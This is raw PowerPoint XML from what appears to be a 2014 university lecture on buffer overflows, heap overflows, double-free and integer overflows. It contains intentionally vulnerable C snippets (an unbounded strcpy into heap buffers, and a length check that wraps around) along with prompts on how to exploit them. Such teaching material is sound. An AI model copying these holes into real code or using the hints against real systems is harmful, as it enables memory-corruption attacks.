              <a:t>And the following statement: buffer[4] = ‘A’;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15649" y="4421688"/>
            <a:ext cx="5210828" cy="8768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Whatever you guessed may be correct!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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582933">
            <a:off x="6482068" y="402095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582933">
            <a:off x="1681467" y="4052155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HEAP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2183" y="3662233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userinput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55576" y="3662232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outputfile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46684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51130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23291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7737" y="3662232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0077" y="3662231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74523" y="3662231"/>
            <a:ext cx="404446" cy="11166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4436207" y="1969715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>
            <a:off x="4436207" y="853091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8" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2329960" y="4778856"/>
            <a:ext cx="202223" cy="566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2509" y="5345425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Memory management metadata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17" idx="0"/>
            <a:endCxn id="2" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3389433" y="2602759"/>
            <a:ext cx="12700" cy="2118947"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51230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906477" y="2586883"/>
            <a:ext cx="12700" cy="2118947"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51230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00897" y="2626956"/>
            <a:ext cx="567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Pointers to next and previous used/free chunks in memory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12509" y="3860742"/>
            <a:ext cx="901543" cy="17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6241" y="3110354"/>
            <a:ext cx="1174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Chunk size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alignment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863970"/>
            <a:ext cx="5607497" cy="454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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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int main(int argc, char *argv[]) {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 = *filed;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*userinput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*outputfile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strcpy(outputfile, "/tmp/foobar");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strcpy(userinput, argv[1]);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filed = fopen(outputfile, "a");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if(filed == NULL){   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    fprintf(stderr, "error opening file %s\n", outputfile);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      exit(1);     }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fprintf(filed, "%s\n", userinput);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fclose(filed);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return 0;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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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6236147" y="2875934"/>
            <a:ext cx="2170434" cy="6341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could you do with this?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650" y="1863970"/>
            <a:ext cx="5607497" cy="454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&lt;stdio.h&gt;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#include &lt;stdlib.h&gt;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int main(int argc, char *argv[]) {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 = *filed;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*userinput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char *outputfile = malloc(20);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strcpy(outputfile, "/tmp/foobar");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strcpy(userinput, argv[1]);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endParaRPr lang="el-GR" altLang="en-US" sz="16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filed = fopen(outputfile, "a");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if(filed == NULL){   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    fprintf(stderr, "error opening file %s\n", outputfile);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      exit(1);     }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fprintf(filed, "%s\n", userinput);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fclose(filed);    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    return 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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  <a:tab pos="9410700" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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6236147" y="2875934"/>
            <a:ext cx="2170434" cy="6341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could you do with this?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Darker Side of Heap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heap is essentially a double-linked list of chunks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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81924" name="Picture 4" descr="http://pages.cs.wisc.edu/%7Evernon/cs367/notes/LINKED-LIST-FIGURES/removenode-db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0" y="2349195"/>
            <a:ext cx="5252269" cy="40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double-free!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4" descr="http://pages.cs.wisc.edu/%7Evernon/cs367/notes/LINKED-LIST-FIGURES/removenode-db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65" y="1796130"/>
            <a:ext cx="5252269" cy="40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Data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in .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and .data segments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16200000">
            <a:off x="4436207" y="1969715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4436207" y="853091"/>
            <a:ext cx="0" cy="561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582933">
            <a:off x="6498514" y="4020954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.data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582933">
            <a:off x="1697913" y="4052155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.data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32183" y="3662233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userinput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46684" y="3662232"/>
            <a:ext cx="1714501" cy="11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outputfile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 smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3869" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s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sz="2429" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What will happen if we stuff more data in an unsigned short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="hi-IN" altLang="en-US" sz="2429" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Lohit Hindi" charset="0"/>
              <a:cs typeface="Lohit Hindi" charset="0"/>
            </a:endParaRP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sz="1890" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1890" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1890" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1890" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>short int = 65536;</a:t>
            </a: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Wrap around!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endParaRPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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What about signed integers?</a:t>
            </a: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Signed numbers use their MSB to determine signedness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endParaRPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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sz="2160" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to exploit this?</a:t>
            </a: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Supply a very large number</a:t>
            </a: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If this number won't fit, it will wraped-around into a smaller number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="768497" lvl="2" indent="-255690">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"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r>
              <a:rPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypass some if statements concering the overflowed variable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SzPct val="80000"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="408532" algn="l"/>
                <a:tab pos="509951" algn="l"/>
                <a:tab pos="921339" algn="l"/>
                <a:tab pos="1332728" algn="l"/>
                <a:tab pos="1744117" algn="l"/>
                <a:tab pos="2155505" algn="l"/>
                <a:tab pos="2566894" algn="l"/>
                <a:tab pos="2978282" algn="l"/>
                <a:tab pos="3389671" algn="l"/>
                <a:tab pos="3801059" algn="l"/>
                <a:tab pos="4212448" algn="l"/>
                <a:tab pos="4623836" algn="l"/>
                <a:tab pos="5035225" algn="l"/>
                <a:tab pos="5446614" algn="l"/>
                <a:tab pos="5858002" algn="l"/>
                <a:tab pos="6269391" algn="l"/>
                <a:tab pos="6680779" algn="l"/>
                <a:tab pos="7092168" algn="l"/>
                <a:tab pos="7503556" algn="l"/>
                <a:tab pos="7914945" algn="l"/>
                <a:tab pos="8326333" algn="l"/>
                <a:tab pos="8467748" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="el-GR" altLang="en-US" sz="216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4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n-US" altLang="en-US" sz="3869" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3869" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" altLang="en-US" sz="3869" dirty="0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int catvars(char *buf1, char *buf2, unsigned int len1, unsigned int len2){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char mybuf[256];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if((len1 + len2) &gt; 256){ /* [3] */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    return -1; }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1440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   memcpy(mybuf, buf1, len1); /* [4] */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 memcpy(mybuf + len1, buf2, len2);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1440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do_some_stuff(mybuf); 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1440" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    return 0; }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endParaRPr lang="el-GR" altLang="en-US" sz="1440" b="1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  <a:tab pos="8467748" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What will happen if len1=0x104 and len2=0xfffffffc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541-C3AF-4688-A032-DE03395DA189}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67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2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Text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Contains the actual program instructions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Read-only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7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988050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.bss segment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Contains static, uninitialized global data and variables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Read-write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8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969052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3081" y="274262"/>
            <a:ext cx="8799267" cy="822789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411389" algn="l"/>
                <a:tab pos="822777" algn="l"/>
                <a:tab pos="1234166" algn="l"/>
                <a:tab pos="1645554" algn="l"/>
                <a:tab pos="2056943" algn="l"/>
                <a:tab pos="2468331" algn="l"/>
                <a:tab pos="2879720" algn="l"/>
                <a:tab pos="3291108" algn="l"/>
                <a:tab pos="3702497" algn="l"/>
                <a:tab pos="4113886" algn="l"/>
                <a:tab pos="4525274" algn="l"/>
                <a:tab pos="4936663" algn="l"/>
                <a:tab pos="5348051" algn="l"/>
                <a:tab pos="5759440" algn="l"/>
                <a:tab pos="6170828" algn="l"/>
                <a:tab pos="6582217" algn="l"/>
                <a:tab pos="6993606" algn="l"/>
                <a:tab pos="7404994" algn="l"/>
                <a:tab pos="7816383" algn="l"/>
                <a:tab pos="8227771" algn="l"/>
                <a:tab pos="8467748" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process Memory Organization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3081" y="1645577"/>
            <a:ext cx="4228219" cy="4936732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.data segment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Contains static, initialized global data and variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="408532" lvl="1" indent="-307113">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="101419" algn="l"/>
                <a:tab pos="512808" algn="l"/>
                <a:tab pos="924196" algn="l"/>
                <a:tab pos="1335585" algn="l"/>
                <a:tab pos="1746973" algn="l"/>
                <a:tab pos="2158362" algn="l"/>
                <a:tab pos="2569751" algn="l"/>
                <a:tab pos="2981139" algn="l"/>
                <a:tab pos="3392528" algn="l"/>
                <a:tab pos="3803916" algn="l"/>
                <a:tab pos="4215305" algn="l"/>
                <a:tab pos="4626693" algn="l"/>
                <a:tab pos="5038082" algn="l"/>
                <a:tab pos="5449470" algn="l"/>
                <a:tab pos="5860859" algn="l"/>
                <a:tab pos="6272248" algn="l"/>
                <a:tab pos="6683636" algn="l"/>
                <a:tab pos="7095025" algn="l"/>
                <a:tab pos="7506413" algn="l"/>
                <a:tab pos="7917802" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Read-write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1" y="1182758"/>
            <a:ext cx="1657005" cy="551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D6F081F-0799-40B0-8DF0-C296370F3B80}" type="slidenum">
              <a:rPr lang="el-GR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="el-G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altLang="en-US" smtClean="0"/>
              <a:t>Fall 2014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812622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1510</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>619</Paragraphs>
  <Slides>67</Slides>
  <Notes>43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Lohit Hindi</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Secure Systems Buffer Overflows  (and other undesirables)</vt:lpstr>
      <vt:lpstr>Different Languages</vt:lpstr>
      <vt:lpstr>C, C++</vt:lpstr>
      <vt:lpstr>Java, C#</vt:lpstr>
      <vt:lpstr>Python, Perl, PHP</vt:lpstr>
      <vt:lpstr>Why Do I Care?</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Process Memory Organization</vt:lpstr>
      <vt:lpstr>Stack Basics</vt:lpstr>
      <vt:lpstr>Simple Function Call</vt:lpstr>
      <vt:lpstr>Simple Function Call</vt:lpstr>
      <vt:lpstr>Simple Function Call</vt:lpstr>
      <vt:lpstr>Simple Function Call</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Control-flow Hijacking</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Stack Overflow Example</vt:lpstr>
      <vt:lpstr>Control-Flow Hijacking</vt:lpstr>
      <vt:lpstr>Control-Flow Hijacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Big Deal!</vt:lpstr>
      <vt:lpstr>Big Deal!</vt:lpstr>
      <vt:lpstr>SETUID Programs</vt:lpstr>
      <vt:lpstr>Local Overflow Attacks</vt:lpstr>
      <vt:lpstr>Local Stack Overflow Attacks</vt:lpstr>
      <vt:lpstr>Remote Overflow Attacks </vt:lpstr>
      <vt:lpstr>Remote Overflow Attacks </vt:lpstr>
      <vt:lpstr>Remote Overflow Attacks </vt:lpstr>
      <vt:lpstr>Remote Overflow Attacks </vt:lpstr>
      <vt:lpstr>Remote Overflow Attacks </vt:lpstr>
      <vt:lpstr>How to Write Shellcode</vt:lpstr>
      <vt:lpstr>Write the Code in C</vt:lpstr>
      <vt:lpstr>In Assembly</vt:lpstr>
      <vt:lpstr>Encode in a String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StackGuard / ProPolice</vt:lpstr>
      <vt:lpstr>StackGuard / ProPolice</vt:lpstr>
      <vt:lpstr>Problem Solved!</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Darker Side of Heap Overflows</vt:lpstr>
      <vt:lpstr>Also double-free!</vt:lpstr>
      <vt:lpstr>Global Data Overflow</vt:lpstr>
      <vt:lpstr>Through Integer Overflows</vt:lpstr>
      <vt:lpstr>Through Integer Overflows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Lab Introduction</dc:title>
  <dc:creator>porto</dc:creator>
  <cp:lastModifiedBy>porto</cp:lastModifiedBy>
  <cp:revision>333</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-28T19:54:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-09-17T04:00:26Z</dcterms:modified>
</cp:coreProperties>
</file>